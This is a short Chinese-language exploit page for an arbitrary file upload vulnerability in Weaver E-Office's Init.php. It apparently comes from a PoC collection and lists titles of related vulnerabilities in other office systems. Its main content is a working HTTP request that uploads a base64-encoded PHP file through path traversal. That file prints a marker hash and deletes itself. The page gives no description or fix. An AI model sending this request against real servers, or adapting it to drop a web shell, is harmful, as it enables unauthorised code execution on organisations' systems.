泛微E-Office Init.php 任意文件上传漏洞

漏洞描述

PoC代码

GET /E-mobile/App/Init.php?m=createDo_Email&upload_file=PD9waHAgZWNobyBtZDUoJ290Z29seCcpO3VubGluayhfX0ZJTEVfXyk/Pg==&file_name=../dides.php HTTP/1.1

相关漏洞推荐

• 新视窗新一代物业管理系统 /OfficeManagement/RegisterManager/Report/Training/Report/GetprintData.asmx SQL 注入漏洞
• 九思OA /jsoa/OfficeServer 文件上传漏洞
• 泛微e-office /E-mobile/App/System/UserSelect/dept.php 未授权访问漏洞
• 万户ezOFFICE协同平台 /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../modules/hrm/report/customize/checkSQL_httprequest.jsp SQL 注入漏洞
• 红帆 IOffice MobileBind.aspx SQL注入漏洞
• POC 普华科技 PowerPMS /PowerPlat/FormXml/DocFile/OfficeService.aspx 文件读取漏洞
• 用友 畅捷通T+ InitContext 登录绕过漏洞
• 普华 PowerPMS OfficeService.aspx SQL注入漏洞
• POC PageOffice /sealimage.zz 文件读取漏洞
• POC PageOffice /loginseal.zz 默认口令漏洞
• 泛微 E-Office /E-mobile/create/ajax_do.php 存在SQL注入漏洞
• 泛微 E-Office /E-mobile/diarydo.php存在SQL注入漏洞
• 红帆 iOffice /ioffice/Identity/HbcaUserLogin.aspx 存在SQL注入漏洞